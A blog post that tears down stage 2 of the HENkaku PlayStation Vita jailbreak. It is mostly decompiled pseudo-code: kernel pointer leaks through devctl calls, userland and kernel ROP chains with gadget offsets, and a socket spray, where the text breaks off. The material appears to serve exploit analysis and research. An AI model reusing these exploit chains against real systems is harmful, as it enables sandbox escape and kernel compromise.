Wednesday, October 19, 2016

HENkaku - Exploit teardown - Stage 2

HENkaku - Stage 2

 

Stage 2's payload is composed of another ROP chain plus data.
It creates two userland threads (each with its own ROP chain) that take care of leaking kernel pointers (by issuing devctl commands to "sdstor0:") and breaking the userland sandbox (by exploiting sceNet functions).
// Copy SD card device path and param
strcpy(x_stack + 0x000086B4, "sdstor0:");
strcpy(x_stack + 0x000086CC, "xmc-lp-ign-userext");
// Clear devctl 0x05 outbuf
// From x_stack + 0x00006F34 to x_stack + 0x00007334
memset(x_stack + 0x00006F34, 0x00000000, 0x00000400);
// Copy dummy device path
strcpy(x_stack + 0x000086E4, "molecule0:");
// Mount path?
sceLibKernel_A4AD("molecule0:");
// Send command 0x05 to "sdstor0:"
sceIoDevctl("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014, x_stack + 0x00006F34, 0x000003FF);
// Store leaked kernel pointer 1
// Comes from devctl_outbuf + 0x3D4
0x00(x_stack + 0x00008464) = 0x00(x_stack + 0x00007308) + 0xFFFFA8B9
// Create "pln" thread
// "pln" == "pointer leak n"?
// Entry (0x000054C8): LDMIA R1,{R1,R2,R4,R8,R11,SP,PC}
int thread_id = sceKernelCreateThread("pln", 0x000054C8, 0x10000100, 0x00002000, 0x00000000, 0x00000000, 0x00000000);
// Store "pln" thread's ID
0x00(x_stack + 0x00008E94) = thread_id
// Store SceKernelThreadInfo size
0x00(x_stack + 0x0000862C) = 0x7C
// Get thread info structure
sceKernelGetThreadInfo(thread_id, x_stack + 0x0000862C);
// Save pln_threadinfo.stack + 0x00001000
0x00(x_stack + 0x00008EA0) = 0x00(x_stack + 0x00008660) + 0x00001000
// Stack parameters for "pln" ROP chain
0x00(x_stack + 0x00008954) = 0x00000014
0x00(x_stack + 0x00008958) = x_stack + 0x00006F34
0x00(x_stack + 0x0000895C) = 0x000003FF
// Stack parameters for "pln" ROP chain
0x00(x_stack + 0x0000896C) = 0x00000400
0x00(x_stack + 0x00008970) = 0x00000000
0x00(x_stack + 0x00008974) = 0x00000000
// Setup "pln" ROP chain
0x00(x_stack + 0x00008708) = 0x008DD9B5
0x00(x_stack + 0x0000870C) = 0x000086E4
0x00(x_stack + 0x00008710) = 0x00000000
0x00(x_stack + 0x00008714) = 0x00000000
0x00(x_stack + 0x00008718) = 0x00000000
0x00(x_stack + 0x0000871C) = 0x0000A4AD
0x00(x_stack + 0x00008720) = 0x00000000
0x00(x_stack + 0x00008724) = 0x000FCDBB
0x00(x_stack + 0x00008728) = 0x00000000
0x00(x_stack + 0x0000872C) = 0x008DD9B5
0x00(x_stack + 0x00008730) = 0x000086B4
0x00(x_stack + 0x00008734) = 0x00000005
0x00(x_stack + 0x00008738) = 0x000086CC
0x00(x_stack + 0x0000873C) = 0x00008954
0x00(x_stack + 0x00008740) = 0x0000690C
0x00(x_stack + 0x00008744) = 0x00000000
0x00(x_stack + 0x00008748) = 0x000FCDBB
0x00(x_stack + 0x0000874C) = 0x00000000
0x00(x_stack + 0x00008750) = 0x008DD9B5
0x00(x_stack + 0x00008754) = 0x000F4240
0x00(x_stack + 0x00008758) = 0x00000000
0x00(x_stack + 0x0000875C) = 0x00000000
0x00(x_stack + 0x00008760) = 0x00000000
0x00(x_stack + 0x00008764) = 0x00018544
0x00(x_stack + 0x00008768) = 0x00000000
0x00(x_stack + 0x0000876C) = 0x000FCDBB
0x00(x_stack + 0x00008770) = 0x00000000
0x00(x_stack + 0x00008774) = 0x008DD9B5
0x00(x_stack + 0x00008778) = 0x000086B4
0x00(x_stack + 0x0000877C) = 0x00000005
0x00(x_stack + 0x00008780) = 0x00007444
0x00(x_stack + 0x00008784) = 0x0000896C
0x00(x_stack + 0x00008788) = 0x0000690C
0x00(x_stack + 0x0000878C) = 0x00000000
0x00(x_stack + 0x00008790) = 0x000FCDBB
0x00(x_stack + 0x00008794) = 0x00000000
0x00(x_stack + 0x00008798) = 0x00000519
/*
"pln" ROP
// Mount path?
sceLibKernel_A4AD("molecule0:");
// Send devctl 0x05
sceIoDevctl_syscall("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014, x_stack + 0x00006F34, 0x000003FF);
// Delay for a while
sceKernelDelayThread(1000000);
// Send devctl 0x05 again using
// input buffer from x_stack + 0x00007444 to x_stack + 0x00007844
sceIoDevctl_syscall("sdstor0:", 0x00000005, x_stack + 0x00007444, 0x00000400, 0x00000000, 0x00000000);
// Deadlock
sceWebkit_519();
*/
// Copy "pln" ROP chain into "pln" thread's stack
memcpy(0x00(x_stack + 0x00008EA0), x_stack + 0x00008708, 0x00000100);
// Set stack pointer
0x00(x_stack + 0x00008830) = x_stack + 0x00008EA0
// Set PC
0x00(x_stack + 0x00008834) = 0x000C048B // POP {PC}
// Start "pln" thread
// Thread arguments are loaded into R1, and the gadget
// at the thread's entry point then loads register values
// from them, overwriting SP and PC and triggering the
// ROP chain
sceKernelStartThread(thread_id, 0x0000001C, x_stack + 0x0000881C);
// Delay for a while
sceKernelDelayThread(100000);
// Store leaked kernel pointer 2
// Comes from devctl_outbuf + 0x3C4
0x00(x_stack + 0x00008458) = 0x00(x_stack + 0x000072F8) + 0xFFFFF544
// Setup pointer to leaked address in kernel module 1
0x00(x_stack + 0x00007444) = 0x00(x_stack + 0x00008464) + 0x0001E460
// Setup pointer to leaked address in kernel module 2
0x00(x_stack + 0x00008EAC) = 0x00(x_stack + 0x00008458) + 0x000006F8 + 0x00000300
// Setup kernel mode ROP chain
0x00(x_stack + 0x00008A8C) = 0x00(x_stack + 0x00008464) + 0x00000031
0x00(x_stack + 0x00008A90) = 0x08106803
0x00(x_stack + 0x00008A94) = 0x00(x_stack + 0x00008464) + 0x0001EFF1
0x00(x_stack + 0x00008A98) = 0x00000038
0x00(x_stack + 0x00008A9C) = 0x00(x_stack + 0x00008464) + 0x0001EFE1
0x00(x_stack + 0x00008AA0) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008AA4) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008AA8) = 0x00(x_stack + 0x00008464) + 0x0001B571
0x00(x_stack + 0x00008AAC) = 0x00000000
0x00(x_stack + 0x00008AB0) = 0x00(x_stack + 0x00008464) + 0x00001E43
0x00(x_stack + 0x00008AB4) = 0x00000000
0x00(x_stack + 0x00008AB8) = 0x00(x_stack + 0x00008464) + 0x0001FC6D
0x00(x_stack + 0x00008ABC) = 0x00(x_stack + 0x00008464) + 0x0000EA73
0x00(x_stack + 0x00008AC0) = 0x00(x_stack + 0x00008464) + 0x00000031
0x00(x_stack + 0x00008AC4) = 0x00(x_stack + 0x00008464) + 0x00027913
0x00(x_stack + 0x00008AC8) = 0x00(x_stack + 0x00008464) + 0x0000A523
0x00(x_stack + 0x00008ACC) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008AD0) = 0x00(x_stack + 0x00008464) + 0x00000CE3
0x00(x_stack + 0x00008AD4) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008AD8) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
0x00(x_stack + 0x00008ADC) = 0x00(x_stack + 0x00008464) + 0x00000067
0x00(x_stack + 0x00008AE0) = 0x00(x_stack + 0x00008464) + 0x0000587F
0x00(x_stack + 0x00008AE4) = 0x00(x_stack + 0x00008464) + 0x00019713
0x00(x_stack + 0x00008AE8) = 0x00(x_stack + 0x00008464) + 0x00001605
0x00(x_stack + 0x00008AEC) = 0x00(x_stack + 0x00008464) + 0x00001E1D
0x00(x_stack + 0x00008AF0) = 0x00000000
0x00(x_stack + 0x00008AF4) = 0x00(x_stack + 0x00008464) + 0x0001EFE1
0x00(x_stack + 0x00008AF8) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008AFC) = 0x00(x_stack + 0x00008464) + 0x00001603
0x00(x_stack + 0x00008B00) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
0x00(x_stack + 0x00008B04) = 0x00(x_stack + 0x00008464) + 0x00001F17
0x00(x_stack + 0x00008B08) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008B0C) = 0x00(x_stack + 0x00008464) + 0x00000031
0x00(x_stack + 0x00008B10) = 0x00(x_stack + 0x00008464) + 0x0000B913
0x00(x_stack + 0x00008B14) = 0x00(x_stack + 0x00008464) + 0x00023B61
0x00(x_stack + 0x00008B18) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008B1C) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008B20) = 0x00(x_stack + 0x00008464) + 0x000232EB
0x00(x_stack + 0x00008B24) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008B28) = 0x00(x_stack + 0x00008464) + 0x0001B571
0x00(x_stack + 0x00008B2C) = 0x00(x_stack + 0x00008464) + 0x00023B61
0x00(x_stack + 0x00008B30) = 0x00(x_stack + 0x00008464) + 0x000232F1
0x00(x_stack + 0x00008B34) = 0x00(x_stack + 0x00008464) + 0x00001411
0x00(x_stack + 0x00008B38) = 0x00(x_stack + 0x00008464) + 0x00000AE1
0x00(x_stack + 0x00008B3C) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008B40) = 0x00(x_stack + 0x00008464) + 0x000050E9
0x00(x_stack + 0x00008B44) = 0x00(x_stack + 0x00008464) + 0x00001411
0x00(x_stack + 0x00008B48) = 0x00000010
0x00(x_stack + 0x00008B4C) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
0x00(x_stack + 0x00008B50) = 0x00(x_stack + 0x00008464) + 0x00012B11
0x00(x_stack + 0x00008B54) = 0x00(x_stack + 0x00008464) + 0x00000CE3
0x00(x_stack + 0x00008B58) = 0x00(x_stack + 0x00008464) + 0x000000D1
0x00(x_stack + 0x00008B5C) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008B60) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
0x00(x_stack + 0x00008B64) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008B68) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008B6C) = 0x00(x_stack + 0x00008464) + 0x0001FDC5
0x00(x_stack + 0x00008B70) = 0x00(x_stack + 0x00008464) + 0x0001D8DB
0x00(x_stack + 0x00008B74) = 0x00(x_stack + 0x00008464) + 0x00019399
0x00(x_stack + 0x00008B78) = 0x00(x_stack + 0x00008464) + 0x00019399
0x00(x_stack + 0x00008B7C) = 0x00(x_stack + 0x00008464) + 0x00011C5F
0x00(x_stack + 0x00008B80) = 0x00(x_stack + 0x00008464) + 0x00019399
0x00(x_stack + 0x00008B84) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008B88) = 0x00(x_stack + 0x00008464) + 0x0000B913
0x00(x_stack + 0x00008B8C) = 0x00000000
0x00(x_stack + 0x00008B90) = 0x00(x_stack + 0x00008464) + 0x0001EFE1
0x00(x_stack + 0x00008B94) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008B98) = 0x00(x_stack + 0x00008464) + 0x00001861
0x00(x_stack + 0x00008B9C) = 0x00(x_stack + 0x00008464) + 0x0001FC6D
0x00(x_stack + 0x00008BA0) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
0x00(x_stack + 0x00008BA4) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008BA8) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008BAC) = 0x00(x_stack + 0x00008464) + 0x00019399
0x00(x_stack + 0x00008BB0) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008BB4) = 0x00(x_stack + 0x00008464) + 0x00019399
0x00(x_stack + 0x00008BB8) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008BBC) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008BC0) = 0x00(x_stack + 0x00008464) + 0x0001614D
0x00(x_stack + 0x00008BC4) = 0x00(x_stack + 0x00008464) + 0x000233D3
0x00(x_stack + 0x00008BC8) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
0x00(x_stack + 0x00008BCC) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008BD0) = 0x00(x_stack + 0x00008464) + 0x000000AF
0x00(x_stack + 0x00008BD4) = 0x00(x_stack + 0x00008464) + 0x00001605
0x00(x_stack + 0x00008BD8) = 0x00(x_stack + 0x00008464) + 0x0001EFE1
0x00(x_stack + 0x00008BDC) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008BE0) = 0x00(x_stack + 0x00008464) + 0x000050E9
0x00(x_stack + 0x00008BE4) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008BE8) = 0x00(x_stack + 0x00008464) + 0x00001347
0x00(x_stack + 0x00008BEC) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008BF0) = 0x00(x_stack + 0x00008464) + 0x000000B9
0x00(x_stack + 0x00008BF4) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
0x00(x_stack + 0x00008BF8) = 0x00(x_stack + 0x00008464) + 0x00001347
0x00(x_stack + 0x00008BFC) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008C00) = 0x00(x_stack + 0x00008464) + 0x0000039B
0x00(x_stack + 0x00008C04) = 0x00000000
0x00(x_stack + 0x00008C08) = 0x00(x_stack + 0x00008464) + 0x0001CB95
0x00(x_stack + 0x00008C0C) = 0x00(x_stack + 0x00008464) + 0x0001EA93
0x00(x_stack + 0x00008C10) = 0x00(x_stack + 0x00008464) + 0x00001411
0x00(x_stack + 0x00008C14) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008C18) = 0x00(x_stack + 0x00008464) + 0x000209D7
0x00(x_stack + 0x00008C1C) = 0x00(x_stack + 0x00008464) + 0x000209D3
0x00(x_stack + 0x00008C20) = 0x00(x_stack + 0x00008464) + 0x00001411
0x00(x_stack + 0x00008C24) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008C28) = 0x00(x_stack + 0x00008464) + 0x0001BAF5
0x00(x_stack + 0x00008C2C) = 0x00(x_stack + 0x00008464) + 0x00001605
0x00(x_stack + 0x00008C30) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008C34) = 0x00(x_stack + 0x00008464) + 0x0000652B
0x00(x_stack + 0x00008C38) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008C3C) = 0x00(x_stack + 0x00008464) + 0x0001BAF5
0x00(x_stack + 0x00008C40) = 0x00(x_stack + 0x00008464) + 0x00022A49
0x00(x_stack + 0x00008C44) = 0xFFFFFEB0
0x00(x_stack + 0x00008C48) = 0x00(x_stack + 0x00008464) + 0x0000039B
0x00(x_stack + 0x00008C5C) = 0x00000040
0x00(x_stack + 0x00008C50) = 0x00(x_stack + 0x00008464) + 0x00022A49
0x00(x_stack + 0x00008C54) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008C58) = 0x00(x_stack + 0x00008464) + 0x0000652B
0x00(x_stack + 0x00008C6C) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008C60) = 0x00(x_stack + 0x00008464) + 0x0000039B
0x00(x_stack + 0x00008C64) = 0x00000040
0x00(x_stack + 0x00008C68) = 0x00(x_stack + 0x00008464) + 0x00001605
0x00(x_stack + 0x00008C6C) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008C70) = 0x00(x_stack + 0x00008464) + 0x0001D9EB
0x00(x_stack + 0x00008C74) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008C78) = 0x00(x_stack + 0x00008464) + 0x00000853
0x00(x_stack + 0x00008C7C) = 0x00(x_stack + 0x00008464) + 0x0001D8DB
0x00(x_stack + 0x00008C80) = 0x00000038
0x00(x_stack + 0x00008C84) = 0x00(x_stack + 0x00008464) + 0x000000AB
0x00(x_stack + 0x00008C88) = 0x00(x_stack + 0x00008464) + 0x000000D1
0x00(x_stack + 0x00008C8C) = 0x00(x_stack + 0x00008464) + 0x0002328B
0x00(x_stack + 0x00008C90) = 0x00(x_stack + 0x00008464) + 0x00022FCD
0x00(x_stack + 0x00008C94) = 0x00(x_stack + 0x00008464) + 0x000000D1
0x00(x_stack + 0x00008C98) = 0x00(x_stack + 0x00008464) + 0x0001EFF1
0x00(x_stack + 0x00008C9C) = 0x00(x_stack + 0x00008464) + 0x0002A117
0x00(x_stack + 0x00008CA0) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008CA4) = 0x00(x_stack + 0x00008464) + 0x00001605
0x00(x_stack + 0x00008CA8) = 0x00(x_stack + 0x00008464) + 0x00019399
0x00(x_stack + 0x00008CAC) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008CB0) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008CB4) = 0x00(x_stack + 0x00008464) + 0x0001BF1F
0x00(x_stack + 0x00008CB8) = 0xFFFFFEB0
0x00(x_stack + 0x00008CBC) = 0x00(x_stack + 0x00008464) + 0x0000039B
0x00(x_stack + 0x00008CC0) = 0x00000040
0x00(x_stack + 0x00008CC4) = 0x00(x_stack + 0x00008464) + 0x00022A49
0x00(x_stack + 0x00008CC8) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008CCC) = 0x00(x_stack + 0x00008464) + 0x00003D73
0x00(x_stack + 0x00008CD0) = 0x00000000
0x00(x_stack + 0x00008CD4) = 0x00(x_stack + 0x00008464) + 0x000021FD
0x00(x_stack + 0x00008CD8) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008CDC) = 0x00(x_stack + 0x00008464) + 0x000050E9
0x00(x_stack + 0x00008CE0) = 0x00(x_stack + 0x00008464) + 0x00000AE1
0x00(x_stack + 0x00008CE4) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008CE8) = 0x00(x_stack + 0x00008464) + 0x0002A117
0x00(x_stack + 0x00008CEC) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008CF0) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
0x00(x_stack + 0x00008CF4) = 0x00(x_stack + 0x00008464) + 0x00000067
0x00(x_stack + 0x00008CF8) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008CFC) = 0x00(x_stack + 0x00008464) + 0x0001BF47
0x00(x_stack + 0x00008D00) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008D04) = 0x00(x_stack + 0x00008464) + 0x000050E9
0x00(x_stack + 0x00008D08) = 0x00(x_stack + 0x00008464) + 0x0000AF33
0x00(x_stack + 0x00008D0C) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008D10) = 0x00(x_stack + 0x00008464) + 0x0001D9EB
0x00(x_stack + 0x00008D14) = 0x00000000
0x00(x_stack + 0x00008D18) = 0x00(x_stack + 0x00008464) + 0x0001FC6D
0x00(x_stack + 0x00008D1C) = 0x00(x_stack + 0x00008464) + 0x0000EA73
0x00(x_stack + 0x00008D20) = 0x00(x_stack + 0x00008464) + 0x0000039B
0x00(x_stack + 0x00008D24) = 0x00(x_stack + 0x00008464) + 0x00000853
0x00(x_stack + 0x00008D28) = 0xFFFFFFFF
0x00(x_stack + 0x00008D2C) = 0x08106803
0x00(x_stack + 0x00008D30) = 0x00(x_stack + 0x00008464) + 0x000233D3
0x00(x_stack + 0x00008D34) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008D38) = 0x00(x_stack + 0x00008464) + 0x00000433
0x00(x_stack + 0x00008D3C) = 0x00(x_stack + 0x00008464) + 0x000233D3
0x00(x_stack + 0x00008D40) = 0x00(x_stack + 0x00008464) + 0x000150A3
0x00(x_stack + 0x00008D44) = 0x00000000
0x00(x_stack + 0x00008D48) = 0x00(x_stack + 0x00008464) + 0x0000A74D
0x00(x_stack + 0x00008D4C) = 0x00(x_stack + 0x00008464) + 0x00000000
0x00(x_stack + 0x00008D50) = 0x00(x_stack + 0x00008464) + 0x00000853
0x00(x_stack + 0x00008D54) = 0x00(x_stack + 0x00008464) + 0x0001BF1F
0x00(x_stack + 0x00008D58) = 0x00000000
0x00(x_stack + 0x00008D5C) = 0x00(x_stack + 0x00008464) + 0x00001605
0x00(x_stack + 0x00008D60) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008D64) = 0x00(x_stack + 0x00008464) + 0x000050E9
0x00(x_stack + 0x00008D68) = 0x00(x_stack + 0x00008464) + 0x00001605
0x00(x_stack + 0x00008D6C) = 0x00(x_stack + 0x00008464) + 0x00022FCD
0x00(x_stack + 0x00008D70) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008D74) = 0x00(x_stack + 0x00008464) + 0x00000853
0x00(x_stack + 0x00008D78) = 0x00(x_stack + 0x00008464) + 0x00011C5F
// Overwrite specific NULLs in the ROP chain
0x00(x_stack + 0x00008C04) = 0x00(x_stack + 0x00008EAC)
0x00(x_stack + 0x00008B48) = 0x00000090
0x00(x_stack + 0x00008CC0) = 0x00000240
0x00(x_stack + 0x00008D58) = 0x00000200
0x00(x_stack + 0x00008D14) = 0x00008FC0
// Copy kernel ROP chain
memcpy(x_stack + 0x00007448, x_stack + 0x00008A8C, 0x300);
// Copy the first 0x400 bytes of "obfuscated" data
// and append them at the bottom of the ROP chain
memcpy(x_stack + 0x00007744, x_stack + 0x00008EB8, 0x400);
// Set kernel thread SP, PC, UNK
0x00(x_stack + 0x00008858) = 0x00(x_stack + 0x00008458) + 0x000006DC
0x00(x_stack + 0x0000884C) = 0x00(x_stack + 0x00008458) + 0x000006F8 + 0x00000004
0x00(x_stack + 0x00008850) = 0x00(x_stack + 0x00008464) + 0x00000347
// Create "mhm" thread
// "mhm" == "move heap memory"?
// Entry (0x000054C8): LDMIA R1, {R1,R2,R4,R8,R11,SP,PC}
int thread_id = sceKernelCreateThread("mhm", 0x000054C8, 0x10000100, 0x00002000, 0x00000000, 0x00000000, 0x00000000);
// Store "mhm" thread's ID
0x00(x_stack + 0x00008620) = thread_id
// Store SceKernelThreadInfo size
0x00(x_stack + 0x0000862C) = 0x0000007C
// Get "mhm" thread's info structure
sceKernelGetThreadInfo(thread_id, x_stack + 0x0000862C);
// Store mhm_threadinfo.stack + 0x00001000
0x00(x_stack + 0x000086FC) = 0x00(x_stack + 0x00008660) + 0x00001000
// Spam sceNetSocket requests
// sceNetSocket("x", AF_INET, SOCK_STREAM, 0);
0x00(x_stack + 0x00008470) = sceNetSocket(x_stack + 0x00010388, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008474) = sceNetSocket(x_stack + 0x00010390, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008478) = sceNetSocket(x_stack + 0x00010398, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000847C) = sceNetSocket(x_stack + 0x000103A0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008480) = sceNetSocket(x_stack + 0x000103A8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008484) = sceNetSocket(x_stack + 0x000103B0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008488) = sceNetSocket(x_stack + 0x000103B8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000848C) = sceNetSocket(x_stack + 0x000103C0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008490) = sceNetSocket(x_stack + 0x000103C8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008494) = sceNetSocket(x_stack + 0x000103D0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008498) = sceNetSocket(x_stack + 0x000103D8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000849C) = sceNetSocket(x_stack + 0x000103E0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084A0) = sceNetSocket(x_stack + 0x000103E8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084A4) = sceNetSocket(x_stack + 0x000103F0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084A8) = sceNetSocket(x_stack + 0x000103F8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084AC) = sceNetSocket(x_stack + 0x00010400, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084B0) = sceNetSocket(x_stack + 0x00010408, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084B4) = sceNetSocket(x_stack + 0x00010410, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084B8) = sceNetSocket(x_stack + 0x00010418, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084BC) = sceNetSocket(x_stack + 0x00010420, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084C0) = sceNetSocket(x_stack + 0x00010428, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084C4) = sceNetSocket(x_stack + 0x00010430, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084C8) = sceNetSocket(x_stack + 0x00010438, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084CC) = sceNetSocket(x_stack + 0x00010440, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084D0) = sceNetSocket(x_stack + 0x00010448, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084D4) = sceNetSocket(x_stack + 0x00010450, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084D8) = sceNetSocket(x_stack + 0x00010458, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084DC) = sceNetSocket(x_stack + 0x00010460, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084E0) = sceNetSocket(x_stack + 0x00010468, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084E4) = sceNetSocket(x_stack + 0x00010470, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084E8) = sceNetSocket(x_stack + 0x00010478, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084EC) = sceNetSocket(x_stack + 0x00010480, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084F0) = sceNetSocket(x_stack + 0x00010488, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084F4) = sceNetSocket(x_stack + 0x00010490, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084F8) = sceNetSocket(x_stack + 0x00010498, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084FC) = sceNetSocket(x_stack + 0x000104A0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008500) = sceNetSocket(x_stack + 0x000104A8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008504) = sceNetSocket(x_stack + 0x000104B0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008508) = sceNetSocket(x_stack + 0x000104B8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000850C) = sceNetSocket(x_stack + 0x000104C0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008510) = sceNetSocket(x_stack + 0x000104C8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008514) = sceNetSocket(x_stack + 0x000104D0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008518) = sceNetSocket(x_stack + 0x000104D8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000851C) = sceNetSocket(x_stack + 0x000104E0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008520) = sceNetSocket(x_stack + 0x000104E8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008524) = sceNetSocket(x_stack + 0x000104F0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008528) = sceNetSocket(x_stack + 0x000104F8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000852C) = sceNetSocket(x_stack + 0x00010500, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008530) = sceNetSocket(x_stack + 0x00010508, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008534) = sceNetSocket(x_stack + 0x00010510, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008538) = sceNetSocket(x_stack + 0x00010518, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000853C) = sceNetSocket(x_stack + 0x00010520, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008540) = sceNetSocket(x_stack + 0x00010528, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008544) = sceNetSocket(x_stack + 0x00010530, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008548) = sceNetSocket(x_stack + 0x00010538, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000854C) = sceNetSocket(x_stack + 0x00010540, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008550) = sceNetSocket(x_stack + 0x00010548, 0x00000002, 0x00000001, 0x00000000);
